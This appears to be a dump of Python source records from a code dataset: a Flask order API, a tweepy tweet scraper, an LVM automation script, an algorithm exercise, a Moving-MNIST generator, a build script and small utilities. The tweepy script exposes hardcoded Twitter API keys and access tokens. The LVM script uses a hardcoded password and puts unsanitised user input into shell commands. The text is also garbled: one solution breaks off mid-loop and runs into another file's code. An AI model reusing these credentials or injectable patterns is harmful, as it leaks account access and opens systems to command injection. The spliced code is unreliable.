not of legal type', status_code=400)\n\n    params = (\n        request.json.get('cell_id'),\n        request.json.get('comment'),\n        EventTypes.index(event_str)\n    )\n\n    insert_stmt = (\"INSERT INTO rsd2018.log (time, cell_id, comment, event) \"\n                   \"VALUES (CURRENT_TIMESTAMP, %s, %s, %s)\"\n                   )\n\n    try:\n        log = {'time': time.time(), 'cell_id': params[0], 'comment': params[1], 'event': params[2]} # store the event index under 'event' so readers of the log find it\n        logs.append(log)\n    except Exception as e:\n        err_str = \"Problem inserting into db: \" + str(e)\n        raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n    return jsonify({'log_entry': len(logs)})\n\n@app.route('/event_types', methods=['GET'])\ndef get_event_types():\n    return jsonify({'EventTypes' : EventTypes})\n\n@app.route('/orders', methods=['GET'])\ndef get_orders():\n    global jobs\n    r = []\n\n    for job in jobs:\n        r.append({'id':job[\"order_id\"], 'blue':job[\"blue\"], 'red':job[\"red\"], 'yellow':job[\"yellow\"], 'status':StatusText[job[\"status\"]]})\n\n    return jsonify({'orders' : r})\n\n@app.route('/orders/<int:order_id>', methods=['GET'])\ndef get_order(order_id):\n    return jsonify({'order': order_id})\n\n@app.route('/orders/<int:order_id>', methods=['PUT'])\ndef update_order(order_id):\n    global jobs\n    try:\n        for index, order in enumerate(jobs):\n            if order[\"order_id\"] == order_id:\n                break\n\n    except Exception as e:\n        
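# report lookup failures as a 500 carrying the original exception text\n        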
err_str = \"Problem selecting order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n if jobs[index]['status'] == 2: # check if the job is already taken\n raise InvalidUsage('Order is taken and not ready', status_code=400)\n\n try:\n jobs[index]['status'] = 2\n except Exception as e:\n err_str = \"Problem updating order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n # now generate the ticket, and insert it into the db\n ticket = uuid.uuid4().hex.upper()[0:6]\n ticket_update_stmt = (\"update rsd2018.jobs set ticket = %s where id = %s\")\n\n try:\n jobs[index]['ticket'] = ticket\n except Exception as e:\n err_str = \"Problem updating order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n return jsonify({'ticket': ticket})\n\n@app.route('/orders/', methods=['DELETE'])\ndef delete_order(order_id):\n global jobs\n if not request.json:\n raise InvalidUsage('Missing json content', status_code=400)\n\n if 'ticket' in request.json:\n if type(request.json['ticket']) is not str:\n raise InvalidUsage('ticket type is not str', status_code=400)\n else:\n raise InvalidUsage('Missing ticket in content', status_code=400)\n\n #TODO: we need to check is the ticket is the same as in the db\n\n try:\n for index, job in enumerate(jobs):\n if index == order_id:\n break\n del jobs[index]\n except Exception as e:\n err_str = \"Problem selecting order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n return jsonify({'deleted': order_id})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"PackML/mes/rsd_2018_app.py","file_name":"rsd_2018_app.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508959312","text":"# -*- coding: utf-8 -*-\n#list of list\nl = [1,2,3]\nm = [[1,3,5],[3,4,5],l]\nprint(m)\n#l[1]=100\n#birden fazla yapida eleman tutmaya yariyor.\n#birinci kolonda maaslar ikinci kolonda adresler gibi birden fazla veri lazım oldugu zaman kullanilir.\np = [[row[i] for row in m] for i in range(3)] #matrixi transpoze ettik.\n#birinci satirin ilk elemanini alıyor. 
print(p)\n\n\n","sub_path":"16701025/listelist.py","file_name":"listelist.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"51334393","text":"import time\nstart_counting = time.time()\nimport csv\nimport tweepy\n\nconsumer_key = 'oSYrCa75rIA7E3a8LSbBvJxPe'\nconsumer_secret = 'GJAf741pOWPsRD6ZJ0e8QlYrnCDcPIbE579eNyZOaY9Fe9fByh'\naccess_token = '2987300974-18sYqXpFrlIPVgj84L9dBwoioFNWjzhaz3ubzVD'\naccess_token_secret = 'mAfnM2p6SyLpkDuwBFobYi2f2HJHtf4zN9uSqTI84PlVZ'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\n# Open/Create a file to append data\ncsvFile = open('OutputData/CryptoTweetDataNoRetweetsID.csv', 'a')\n\n# Use csv Writer\ncsvWriter = csv.writer(csvFile)\n\n# specify the search terms and result type, and exclude retweets\n\nfor tweet in tweepy.Cursor(api.search, q=\"bitcoin OR cryptocurrency OR cryptomarket -filter:retweets\",\n                           result_type=\"mixed\",\n                           since_id=1240322076734610000,\n                           count=100,\n                           lang=\"en\").items():\n    # print output of the section and save the outcomes to a csv file.\n    print(tweet.created_at, tweet.text)\n    csvWriter.writerow([tweet.id, tweet.created_at, tweet.text.encode('utf-8')])\n\nprint('It took {0:0.1f} seconds'.format(time.time() - start_counting))","sub_path":"DataCollection(Tweet).py","file_name":"DataCollection(Tweet).py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"65315420","text":"#Competitive Coding 3\n#Problem1 : https://leetcode.com/problems/k-diff-pairs-in-an-array/\n#All test cases passed on Leetcode\n#Time Complexity-O(NlogN)\n#Space Complexity-O(1)\n\nclass Solution:\n    def findPairs(self, nums, k):\n        #Approach: sort the array,\n        #take two pointers, slow and fast; take the difference between the values at slow and fast and check the cases below\n        #3 cases: diff<k, diff>k and diff==k\n        #for uniqueness: check the values at positions fast-1 and fast; if they are the same, fast+=1\n        \n        nums.sort()\n        #initializations\n        #to maintain the count of unique k-diff pairs in the array\n        count=0\n        slow=0\n        fast=0\n        n=len(nums)\n        \n        #we exit the loop when slow or fast reaches n\n        while slow<n and fast<n:\n            diff = nums[fast]-nums[slow]\n            #case 1: diff<k (or the two pointers overlap)\n            if slow == fast or diff<k:\n                fast+=1\n            #case 2: diff>k\n            elif diff>k:\n                slow+=1\n            #case 3: diff==k\n            else:\n                slow+=1\n                fast+=1\n                count+=1\n                while fast<n and nums[fast]==nums[fast-1]:\n                    fast+=1\n        return count\n            if motions[i] == \"vertical\":\n                canv.paste(images[i], (int(positions[i][0]), int(positions[i][1])))\n                if motion_dict[i][\"veloc\"][1] >= 0:\n                    action_vectors[img_idx][frame_idx][1] = 1\n                elif motion_dict[i][\"veloc\"][1] < 0:\n                    action_vectors[img_idx][frame_idx][0] = 1\n            elif motions[i] == \"horizontal\":\n                canv.paste(images[i], (int(positions[i][0]), int(positions[i][1])))\n                if motion_dict[i][\"veloc\"][0] >= 0:\n                    action_vectors[img_idx][frame_idx][3] = 1\n                elif motion_dict[i][\"veloc\"][0] < 0:\n                    action_vectors[img_idx][frame_idx][2] = 1\n            canvas += arr_from_img(canv, mean=0)\n\n            for i in range(len(digits)):\n                if motions[i] in [\"vertical\", \"horizontal\", \"zigzag\"]:\n                    for j in range(2):\n                        new_pos = positions[i][j] + motion_dict[i][\"veloc\"][j]\n                        if new_pos < -2 or new_pos > lims[j] + 2:\n                            motion_dict[i][\"veloc\"][j] *= -1\n                        positions[i][j] += motion_dict[i][\"veloc\"][j]\n                elif motions[i] in [\"circular_clockwise\", \"circular_anticlockwise\"]:\n                    motion_dict[i][\"theta\"] += motion_dict[i][\"angular_velocity\"]\n                    r = motion_dict[i][\"r\"]\n                    theta = motion_dict[i][\"theta\"]\n                    positions[i][0] = width//2 + r*math.cos(theta) - original_size//2\n                    
positions[i][1] = height//2 - r*math.sin(theta) - original_size//2\n elif motions[i] == \"tofro\":\n if motion_dict[i][\"waxing\"]:\n motion_dict[i][\"size\"]+=motion_dict[i][\"size_step\"]\n newX = motion_dict[i][\"center_x\"] - motion_dict[i][\"size\"]//2\n newY = motion_dict[i][\"center_y\"] - motion_dict[i][\"size\"]//2\n if newX < -2 or newX > (width - motion_dict[i][\"size\"]) + 2 or newY < -2 or newY > (height - motion_dict[i][\"size\"]) + 2:\n motion_dict[i][\"waxing\"] = False\n else:\n motion_dict[i][\"size\"]-=motion_dict[i][\"size_step\"]\n if motion_dict[i][\"size\"] == original_size:\n motion_dict[i][\"waxing\"] = True\n\n # Add the canvas to the dataset array\n dataset[img_idx * num_frames + frame_idx] = (canvas * 255).clip(0, 255).astype(np.uint8)\n\n return dataset, action_vectors\n\ndef tack_on(digit, motion, caption):\n caption += ' digit {} is moving'.format(digit)\n if motion == \"vertical\":\n caption += ' up and down'\n elif motion == \"horizontal\":\n caption += ' left and right'\n elif motion == \"circular_clockwise\":\n caption += ' clockwise in a circle'\n elif motion == \"circular_anticlockwise\":\n caption += ' anti-clockwise in a circle'\n elif motion == \"zigzag\":\n caption += ' in a zigzag path'\n elif motion == \"tofro\":\n caption += ' to and fro'\n return caption\n\ndef main(digits, motions, dest, frame_size=64, num_frames=30, num_sequences=1, original_size=28):\n\n assert len(digits) > 0, \"Need at least one digit\"\n\n\n dat, action_vectors = generate_moving_mnist(shape=(frame_size, frame_size), num_frames=num_frames, num_sequences=num_sequences,\n digits=digits, motions=motions, original_size=original_size)\n\n caption = tack_on(digits[0], motions[0], 'The')\n if len(digits) > 1:\n for i in range(1, len(digits)):\n caption += ' and the'\n caption = tack_on(digits[i], motions[i], caption)\n caption += '.'\n\n fcount = len(os.listdir(dest))\n\n f = open(os.path.join(dest, 'captions.txt'), 'a')\n for i in range(num_sequences):\n image_dir = os.path.join(dest, '{}'.format(fcount))\n fcount += 1\n os.makedirs(image_dir)\n for j in range(num_frames):\n Image.fromarray(get_image_from_array(dat, i*num_frames+j, mean=0)).save(os.path.join(image_dir, '{}.jpg'.format(j)))\n f.write('{},{}\\n'.format(image_dir, caption))\n with open(os.path.join(image_dir, 'actions.pkl'.format(i)), 'wb') as action_f:\n pickle.dump(action_vectors[i], action_f)\n f.close()\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Command line options')\n # The 'dest' argument is the directory in which to store the generated GIFs\n # The 'num_gifs' argument is the no. 
of GIFs to create\n    parser.add_argument('--dest', type=str, dest='dest', default='movingmnist')\n    parser.add_argument('--num_gifs', type=int, dest='num_gifs', default=1) # number of sequences to generate\n    args = vars(parser.parse_args(sys.argv[1:]))\n\n    dest = args['dest']\n    num_sequences = args['num_gifs']\n\n    # Create directory and the captions file\n    if not os.path.exists(dest):\n        os.makedirs(dest)\n\n    if not os.path.exists(os.path.join(dest, 'captions.txt')):\n        open(os.path.join(dest, 'captions.txt'), 'x')\n\n    allowed_motions = [\"vertical\", \"horizontal\", \"circular_clockwise\", \"circular_anticlockwise\", \"zigzag\", \"tofro\"]\n\n\n    digits = [0]\n    motions = [\"vertical\", \"horizontal\"]  # only the first len(digits) entries are used by main()\n\n    main(digits, motions, dest, num_sequences=num_sequences)\n","sub_path":"moving_mnist.py","file_name":"moving_mnist.py","file_ext":"py","file_size_in_byte":12980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"406178496","text":"import os\nimport getpass\n\nos.system(\"tput bold\")\nos.system(\"tput setaf 1\")\nprint(\"\\t\\t\\tLogical Volume Management\")\nos.system(\"tput setaf 7\")\n\nprint(\"\\t\\t\\t------------------------\")\n\npasswd = getpass.getpass(\"Enter the password: \")\napass = \"mb\"\n\nif passwd != apass:\n\tprint(\"Access Denied\")\n\texit()\n\nprint(\"Where would you like to perform your job (local/remote)?\", end=' ')\nlocation = input()\nprint(location)\n\nif location == \"remote\":\n\tremoteIP = input(\"Enter the IP Address: \")\n\ndef lvm_automate():\n\tos.system(\"tput setaf 2\")\n\tprint(\"Displaying the Available Disks\")\n\tos.system(\"fdisk -l\")\n\tnum = int(input(\"How many disks do you want to combine into a single Volume Group: \"))\n\tdisks = []\n\n\tfor i in range(num):\n\t\tdisk = input(f\"Enter the {i+1} disk name of which you would like to create a Physical Volume: \")\n\t\tdisks.append(disk)\n
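\t\t# Note on the try/except blocks in this script: os.system() returns the\n\t\t# command's exit status instead of raising, so a failing pvcreate will not\n\t\t# reach the except branch. A stricter variant (illustrative sketch, not\n\t\t# wired in here) would be:\n\t\t#     import subprocess\n\t\t#     subprocess.run([\"pvcreate\", disk], check=True)  # raises CalledProcessError on failure\n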
\t\ttry:\n\t\t\tos.system(f\"pvcreate {disk}\")\n\t\texcept:\n\t\t\tprint(\"Error occurred!! Could not create a Physical Volume!!\")\n\t\telse:\n\t\t\tos.system(\"tput setaf 3\")\n\t\t\tprint(\"Successfully created the Physical Volume!!\")\n\n\t\tos.system(f\"pvdisplay {disk}\")\n\t\n\tlength = len(disks)\n\tprint(\"Number of disks: \", length)\n\n\tvg_name = input(\"Enter the name of the Volume Group: \")\n\ttry:\n\t\t# combine every physical volume the user listed, not just the first two\n\t\tos.system(f\"vgcreate {vg_name} {' '.join(disks)}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Successfully created Volume Group\")\n\n\tlv_name = input(\"Enter the name of the Logical Volume: \")\n\tsize = int(input(\"Enter the size of the Logical Volume: \"))\n\ttry:\n\t\tos.system(f\"lvcreate --size {size} --name {lv_name} {vg_name}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Successfully created the Logical Volume!!\")\n\t\n\tos.system(\"tput setaf 2\")\n\tprint(\"Displaying the details of the Logical Volume\")\n\tos.system(f\"lvdisplay {vg_name}/{lv_name}\")\n\t\n\tos.system(\"tput setaf 3\")\n\tprint(\"Formatting the Logical Volume...\")\n\tos.system(f\"mkfs.ext4 /dev/{vg_name}/{lv_name}\")\n\t\n\tdir_loc = input(\"Enter the Directory location which you want to mount with the Logical Volume: \")\n\ttry:\n\t\tos.system(f\"mount /dev/{vg_name}/{lv_name} {dir_loc}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tos.system(\"tput setaf 2\")\n\t\tprint(\"Successfully mounted the Directory\")\n\n\tprint(\"Displaying information about the Disks...\")\n\tos.system(\"df -h\")\n\ndef lvm_extend():\n\tvg_name = input(\"Enter the name of the Volume Group: \")\n\tlv_name = input(\"Enter the name of the Logical Volume: \")\n\tsize = int(input(\"Enter the size of the Logical Volume: \"))\n\ttry:\n\t\tos.system(f\"lvextend --size {size} /dev/{vg_name}/{lv_name}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Size of Logical Volume Changed!!\")\n\t\n\tprint(\"Formatting the remaining portion of the Logical Memory...\")\n\ttry:\n\t\tos.system(f\"resize2fs /dev/{vg_name}/{lv_name}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Successfully formatted the remaining portion!!\")\n\nwhile True:\n\t\n\tprint(\"1. Logical Volume Management\")\n\tprint(\"2. 
Extend Logical Volume\")\n\tprint(\"Enter Your Choice: \",end=' ')\n\tch = input()\n\n\tif int(ch) == 1:\n\t\tlvm_automate()\n\telif int(ch) == 2:\n\t\tlvm_extend()\n\n\tinput(\"Enter to continue...\")\t\n\tos.system(\"clear\")\n\n\n\n","sub_path":"lvm-automation.py","file_name":"lvm-automation.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292456369","text":"# Multiple Regression.\n\nfrom sklearn import linear_model\nfrom decimal import Decimal\nimport json\n\n\ndata = json.loads(open('data1.json', 'r').read())['data']\n\nX = []\nY = []\n\nfor obj in data:\n arr = obj['metadata'][:3]\n arr.append(obj['metadata'][-1])\n X.append(arr)\n layout = []\n for arr in obj['duration']:\n layout.append(arr[4] + arr[5])\n layout.sort(reverse=True)\n Y.append(sum(layout[:5]))\n\nlr = linear_model.LinearRegression()\nlr.fit(X, Y)\n\noutput = open('coef.txt', 'w')\nfor v in lr.coef_:\n v_ = Decimal(v).quantize(Decimal('1.00'))\n output.write(str(v_))\n output.write('\\n')\noutput.close()\n","sub_path":"analyze/mr.py","file_name":"mr.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16596744","text":"def pierwsze(n):\n lista = []\n flaga = 0\n for i in range(2,n+1):\n for j in range(2,i):\n if i%j == 0:\n flaga = 1\n if flaga == 0:\n lista.append(i)\n else:\n flaga = 0\n return lista\n\n\n\nkotek = pierwsze(100)\nprint(kotek)","sub_path":"lek3.py","file_name":"lek3.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356184034","text":"import os\n\nImport(\"env\")\n\n# Note: \"riscv-fw-infrastructure\" repository contains toolchains and eclipse\nFW_DIR = os.path.join(\n \"$PROJECT_CORE_DIR\", \"packages\", \"riscv-fw-infrastructure\", \"WD-Firmware\"\n)\n\nboard = env.BoardConfig()\nvariant_dir = os.path.join(FW_DIR, \"board\", board.get(\"build.variant\", \"\"))\n\nenv.Append(\n ASFLAGS=[\n \"-x\", \"assembler-with-cpp\",\n \"-Wa,-march=%s\" % board.get(\"build.march\")\n ],\n\n CCFLAGS=[\n \"-Os\",\n \"-Wall\",\n \"-ffunction-sections\",\n \"-fdata-sections\",\n \"-march=%s\" % board.get(\"build.march\"),\n \"-mabi=%s\" % board.get(\"build.mabi\"),\n \"-mcmodel=%s\" % board.get(\"build.mcmodel\"),\n \"-fno-builtin-printf\",\n ],\n CPPDEFINES=[\n \"D_USE_RTOSAL\",\n \"D_USE_FREERTOS\",\n (\"D_TICK_TIME_MS\", 4),\n (\"D_ISR_STACK_SIZE\", 400),\n (\"D_MTIME_ADDRESS\", \"0x80001020\"),\n (\"D_MTIMECMP_ADDRESS\", \"0x80001028\"),\n (\"D_CLOCK_RATE\", 50000000),\n (\"D_PIC_BASE_ADDRESS\", \"0xA0000000\"),\n (\"D_PIC_NUM_OF_EXT_INTERRUPTS\", 256),\n (\"D_EXT_INTERRUPT_FIRST_SOURCE_USED\", 0),\n (\"D_EXT_INTERRUPT_LAST_SOURCE_USED\", 255),\n ],\n\n CPPPATH=[\n \"$PROJECT_SRC_DIR\",\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"loc_inc\"),\n os.path.join(FW_DIR, \"common\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\", \"include\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"config\", \"swerv_eh1\"),\n os.path.join(FW_DIR, \"psp\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\", \"include\"),\n ],\n\n LINKFLAGS=[\n \"-Os\",\n \"-march=%s\" % board.get(\"build.march\"),\n \"-mabi=%s\" % board.get(\"build.mabi\"),\n \"-mcmodel=%s\" % board.get(\"build.mcmodel\"),\n 
\"-Wl,-gc-sections\",\n \"-nostdlib\",\n \"-nostartfiles\",\n \"-static\",\n \"-Wl,--wrap=malloc\",\n \"-Wl,--wrap=free\",\n \"-Wl,--wrap=open\",\n \"-Wl,--wrap=lseek\",\n \"-Wl,--wrap=read\",\n \"-Wl,--wrap=write\",\n \"-Wl,--wrap=fstat\",\n \"-Wl,--wrap=stat\",\n \"-Wl,--wrap=close\",\n \"-Wl,--wrap=link\",\n \"-Wl,--wrap=unlink\",\n \"-Wl,--wrap=execve\",\n \"-Wl,--wrap=fork\",\n \"-Wl,--wrap=getpid\",\n \"-Wl,--wrap=kill\",\n \"-Wl,--wrap=wait\",\n \"-Wl,--wrap=isatty\",\n \"-Wl,--wrap=times\",\n \"-Wl,--wrap=sbrk\",\n \"-Wl,--wrap=_exit\"\n \"-Wl,-Map=\"\n + os.path.join(\"$BUILD_DIR\", os.path.basename(env.subst(\"${PROJECT_DIR}.map\"))),\n \"-Wl,--defsym=__comrv_cache_size=0\",\n ],\n\n LIBPATH=[variant_dir],\n\n LIBS=[\"c\", \"gcc\"]\n)\n\n# copy CCFLAGS to ASFLAGS (-x assembler-with-cpp mode)\nenv.Append(ASFLAGS=env.get(\"CCFLAGS\", [])[:])\n\n# Only for C/C++ sources\nenv.Append(CCFLAGS=[\"-include\", \"sys/cdefs.h\"])\n\nif not board.get(\"build.ldscript\", \"\"):\n env.Replace(LDSCRIPT_PATH=\"link.lds\")\n\n\n#\n# Target: Build libraries\n#\n\nlibs = []\n\nif \"build.variant\" in board:\n env.Append(CPPPATH=[variant_dir, os.path.join(variant_dir, \"bsp\")])\n libs.append(env.BuildLibrary(os.path.join(\"$BUILD_DIR\", \"BoardBSP\"), variant_dir))\n\nlibs.extend([\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"FreeRTOS\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\"),\n src_filter=[\n \"-<*>\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n ],\n ),\n\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"RTOS-AL\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\"),\n src_filter=\"+<*> - -\",\n ),\n\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"PSP\"),\n os.path.join(FW_DIR, \"psp\"),\n src_filter=[\n \"-<*>\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\"\n ],\n )\n])\n\nenv.Prepend(LIBS=libs)\n","sub_path":"examples/rtosal-freertos/build-freertos.py","file_name":"build-freertos.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65232495","text":"# Set graph styling to common styles\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport seaborn as sns\nplt.style.use('seaborn-poster')\nmatplotlib.rcParams['font.family'] = 'League Spartan'\n\n# So I don't have to keep looking up how to do this...\ndef f_int(x):\n return format(int(x), ',')\n# some matplotlib functions pass in a position, which we don't need\ndef mf_int(x, pos):\n return f_int(x)\ndef format_axis_labels_with_commas(axis):\n axis.set_major_formatter(matplotlib.ticker.FuncFormatter(mf_int))\ndef format_plt_labels_with_commas(plt):\n # I have no idea what the 111 magic number is. 
def format_plt_labels_with_commas(plt):\n    # 111 is matplotlib's three-digit shorthand: 1 row, 1 column, first plot.\n    # pyplot has no get_subplot(); use subplot(111) and take its y-axis, since\n    # format_axis_labels_with_commas expects an Axis (see the callers below).\n    axis = plt.subplot(111).yaxis\n    format_axis_labels_with_commas(axis)\ndef annotate(axis, text, xy, xy_text):\n    axis.annotate(\"${:,}\".format(int(text)), xy=xy,\n                  xytext=xy_text,\n                  arrowprops=dict(facecolor='black', connectionstyle=\"arc3,rad=.2\"),\n                  fontsize=14)\n\ndef find_smallest(s):\n    smallest = min(s)\n    index_of = s.index(smallest)\n    return (index_of, smallest)\n\ndef find_biggest(s):\n    biggest = max(s)\n    index_of = s.index(biggest)\n    return (index_of, biggest)\n\ndef annotate_smallest(axis, s, location=None):\n    (x, y) = find_smallest(s)\n    if location == None:\n        location = (x * Decimal('1.1'), y * Decimal('.9'))\n\n    annotate(axis, y, (x, y), location)\n\ndef annotate_biggest(axis, s, location=None):\n    (x, y) = find_biggest(s)\n    if location == None:\n        location = (x * Decimal('0.9'), y * Decimal('1.1'))\n\n    annotate(axis, y, (x, y), location)\n\ndef plot(s, x_label='', y_label='', y_lim=(), title=''):\n    fig, ax1 = plt.subplots()\n    ax1.plot(s, 'b')\n    ax1.set_ylabel(y_label, color='b')\n    ax1.set_ylim(y_lim)\n    ax1.set_xlabel(x_label)\n\n    for tl in ax1.get_yticklabels():\n        tl.set_color('b')\n\n    plt.title(title)\n    plt.show()\n\ndef plot_two(s1, s2, s1_title='', s2_title='', x_label='', title='', y_lim=()):\n    fig, ax1 = plt.subplots()\n    ax1.plot(s1, 'b')\n    ax1.set_ylabel(s1_title, color='b')\n    ax1.set_xlabel(x_label)\n    ax1.set_ylim(y_lim)\n    for tl in ax1.get_yticklabels():\n        tl.set_color('b')\n\n    format_axis_labels_with_commas(ax1.get_yaxis())\n\n    ax2 = ax1.twinx()\n    ax2.plot(s2, 'g')\n    ax2.set_ylabel(s2_title, color='g')\n    ax2.set_ylim(y_lim)\n    for tl in ax2.get_yticklabels():\n        tl.set_color('g')\n    format_axis_labels_with_commas(ax2.get_yaxis())\n\n    plt.xlabel(x_label)\n    plt.title(title)\n    plt.show()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"31366470","text":"# %% Result\n\n# %% Tasks\n'''\nLet's tidy up our dataset by:\n\n1. Dropping unnecessary columns (i.e. 'Unnamed: 0')\n2. Replacing the majors with their full names.\n3. Replacing 'M' and 'F' with their full form.\n\n    | Before | After |\n    | :----: | :----------- |\n    | PHY | Physics |\n    | CHM | Chemistry |\n    | LS | Life Sciences |\n    | CBIO | Comp. Biology |\n'''\n\n# %% Solution\nfrom sys import argv  # Hide\n\nimport pandas as pd  # Hide\n\ndf = pd.read_excel('./files/dummy_class.xls')  # Hide\n
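\n# Illustrative behaviour of the replace() call used below (plain pandas\n# semantics, not specific to this dataset):\n#     pd.Series(['PHY', 'M']).replace({'PHY': 'Physics', 'M': 'Male'})\n#     -> 0    Physics\n#        1       Male\n# With inplace=True the DataFrame is modified in place and None is returned.\n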
\nmy_to_replace = {\n    'PHY': 'Physics',\n    'CHM': 'Chemistry',\n    'LS': 'Life Sciences',\n    'CBIO': 'Comp. Biology',\n    'F': 'Female',\n    'M': 'Male'\n}\n\n# What does inplace do?\ndf.replace(to_replace=my_to_replace, inplace=True)\n\n# Now let's drop the unnecessary columns\nmy_to_drop = 'Unnamed: 0'\ndf.drop(columns=my_to_drop, inplace=True)\n\nwith open(f'{argv[0]}.html', 'w') as file:  # Hide\n    file.write(df.head(10).to_html())  # Hide\n","sub_path":"files_python/dummy-class_housekeeping-02.py","file_name":"dummy-class_housekeeping-02.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"9155070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 4 12:33:00 2018\n\n@author: nguyentran\n\"\"\"\n\nfrom flask import Flask, request, abort\nfrom flask_restful import Resource, Api, abort, reqparse\nimport json\nimport yaml\nfrom ISEPLib.abstract_services import *\nimport requests\nimport re\n\nimport ISEPLib.message as message\nimport ISEPLib.entity as entity\nimport ISEPLib.rest_endpoints as rest_endpoints\n\nclass AbsResource(Resource):\n    def __init__(self, service = None, self_host_port = \"\", rest_endpoint = \"\", *args, **kwargs):\n        self.service = service\n        self.rest_endpoint = rest_endpoint\n        self.self_host_port = self_host_port\n\n    #==========================================================================\n    # utilities\n    #==========================================================================\n    def create_parser(self, *args):\n        # Create a parser for form data submitted by clients via POST or PUT\n        parser = reqparse.RequestParser()\n        # Configure the parser to look for certain arguments in the submitted data\n        # Submitted data can be considered a dictionary with argument : value pairs\n        for arg in args:\n            # Indicate that this API expects an argument with this name in the submitted data\n            # After parsing, we can be sure the given argument exists and the data is safe\n            parser.add_argument(arg)\n        return parser\n\n    def extract_from_payload(self, key, payload_key = \"payload\"):\n        parser = self.create_parser(payload_key)\n        args = parser.parse_args()\n\n        with open(\"simple_service_log.txt\", \"w\") as file:\n            file.write(str(request.values))\n        # file.write(str(messages.CollectorPostResMessage(request.url,\n        #                                                 \"timestamp-id of the collected set of IoT content\",\n        #                                                 contentURL).to_dict()))\n\n        value = yaml.safe_load(args[payload_key])[key]  # safe_load avoids executing arbitrary YAML tags\n        return value\n\n    def extract_callback_url(self):\n        \"\"\"\n        This method checks whether the given message is a callback message.\n        If it is, extract the callback URL and return it.\n        Otherwise, return \"not_callback\"\n        \"\"\"\n        parser = self.create_parser(\"type\")\n        args = parser.parse_args()\n\n        mes_type = args[\"type\"]\n        if mes_type == \"callback_message\":\n            callback_url = self.extract_from_payload(\"url\")\n            return callback_url\n        else:\n            return \"not_callback\"\n\n    def extract_from_cookies(self, key = \"\"):\n        value = request.cookies.get(key)\n        return value\n\n    def extract_workflow_id(self, wf_id = \"wf_id\", abort_req = False):\n        \"\"\"\n        Extract workflow id from the cookie sent to this service\n        \"\"\"\n        workflow_id = self.extract_from_cookies(key = wf_id)\n        if workflow_id and type(workflow_id) is str:\n            # If workflow id is available as a string, return as is\n            return workflow_id\n        else:\n            if abort_req:\n                # If the abort flag is set, return an error code and stop processing the request\n                abort(400)\n            else:\n                # otherwise, return an empty string\n                return \"\"\n    \n
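    # The helpers below implement this module's callback convention: a request\n    # either carries its data inline in 'payload', or is a 'callback_message'\n    # whose payload holds only a URL, which is then fetched with GET (forwarding\n    # the wf_id cookie) to obtain the real data. Illustrative inline form\n    # (field names as parsed by extract_from_payload above):\n    #     {\"type\": \"data\", \"payload\": \"{iot_contents: [...]}\"}\n    # Illustrative callback form:\n    #     {\"type\": \"callback_message\", \"payload\": \"{url: http://host/api/res-contents/42}\"}\n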
